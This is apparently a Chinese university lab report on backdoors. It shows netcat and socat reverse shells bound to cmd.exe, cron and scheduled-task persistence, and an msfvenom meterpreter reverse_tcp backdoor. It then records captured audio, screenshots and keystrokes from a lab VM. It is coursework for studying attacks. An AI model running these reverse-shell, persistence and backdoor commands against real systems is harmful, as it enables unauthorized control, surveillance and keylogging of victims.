2017-2018-2 20155225《网络对抗技术》实验二 后门原理与实践

2017-2018-2 20155225《网络对抗技术》实验二 后门原理与实践

实验内容

1、使用netcat获取主机操作Shell，cron启动

linux作为攻击方，window7作靶机。

1. ping通

我使用的NAT连接，在查询IP地址时遇到问题，解决方法见“遇到的问题1”

win7IP地址如下：

linuxIP地址如下：

linux ping win7：

win7 ping linux：

2. 攻击方打开8888端口，开始监听。

nc -l -p 8888 //-l:设置监听模式，-p:端口

3. 靶机运行nc，绑定shell，主动连接攻击方。

ncat.exe -e cmd.exe 192.168.226.129 8888 //-e filename:连接后执行该文件。

4. linux成功获得win7 shell
   

5. cron启动

cron是linux下的定时执行工具。crontab是使用cron的命令，该命令从标准输入设备读取指令，并将其存放于“crontab”文件中，以供之后读取和执行。

win7开启监听，将linux反向连接的指令写入crontab中即可。
crontab指令写法：

基本格式 : 

*　　*　　*　　*　　*　　command 

分　时　日　月　周　命令 

第1列表示分钟1～59 每分钟用*或者 */1表示 

第2列表示小时1～23（0表示0点） 

第3列表示日期1～31 

第4列表示月份1～12 

第5列标识号星期0～6（0表示星期天） 

第6列要运行的命令 

使用命令crontab –l 可以显示出当前用户cron服务的详细内容。

使用命令crontab –e 可以打开默认的编辑当前用户cron服务的编辑器

使用crontab -l编辑crontab文件，在最后加上时间和我们想要执行的命令，保存退出。到了规定时间，系统会自动执行我们设置的指令。操作如下：

结果如下：

2、使用socat获取主机操作Shell, 任务计划启动

socat是超级netcat工具，socat直接就可以用的程序。我们只需要在windows下新建一个任务来执行socat程序即可。

windows开启8888端口作为监听方，并绑定cmd.exe.在添加参数一栏填写命令参数

tcp-listen:8888 exec:cmd.exe,pty,stderr

linux作为攻击端去主动去连接windows：

socat - tcp:192.168.226.130:8888 //这个命令等同于nc 192.168.226.130 8888

触发该程序之后，linux立刻获取到windows的shell,如图所示。注意，并不是监听端一定是攻击方，反弹连接的也不一定就是靶机。在双方的连接过程中，谁绑定了shell，谁就暴露了shell，就会被对方获得。

3、使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1. 生成后门程序，使用这条命令直接生成一个后门程序（river.exe）

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.226.130 LPORT=8888 -f exe > river.exe

2. 手动将后门程序river.exe拷到win7
3. 在linux上使用msfconsole指令进入msf控制台，开启监听模块，设置payload，设置反弹回连的IP和端口：192.168.226.130，8888，具体命令如下图：

（msf超级可爱ヾ(❀ ^ ω^)ﾉﾞ！每次进入msf都会给我不同的界面！）

4. river.exe一旦运行，win7就被linux控制了，哈哈哈哈。

4、使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

meterpreter都有哪些功能呢？可用help查看。最有趣的当然是摄像头命令了。

成功截获一段音频，摄像录像功能因为我的win7虚拟机没有摄像驱动，所以没有成功。

成功抓屏：

成功获得win7击键记录：

加分项目：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell（内容见我又写的另一篇博客使用MSF生成shellcode）

遇到的问题

1、NAT模式下，虚拟机无法自动获取IP地址

解决方法：在任务管理器里，手动开启Vmware DHCP 和 VMware NAT service这两个服务，如图所示。参考博客

2、cmd命令，如何进入某文件夹，如何查看当前目录下文件,进入D盘

cd.. 返回上一级目录

dir 查看该目录下的所有文件

d: 进入D盘

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

下载软件的时候，包装在好软件外表下！再不敢在网上下乱七八糟的软件了。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

绑定在一个指令里，你运行就中招了。

(3)Meterpreter有哪些给你映像深刻的功能？

摄像头，有意思。

(4)如何发现自己有系统有没有被安装后门？

用杀软去杀啊……我也只有这一个办法。

实验总结与体会

做完整个实验，我就想说一句话“工欲善其事必先利其器”，有msf这么牛逼的工具可以用，简直事半功倍啊！！不会写shellcode也没关系，msfvenom来帮你搞定。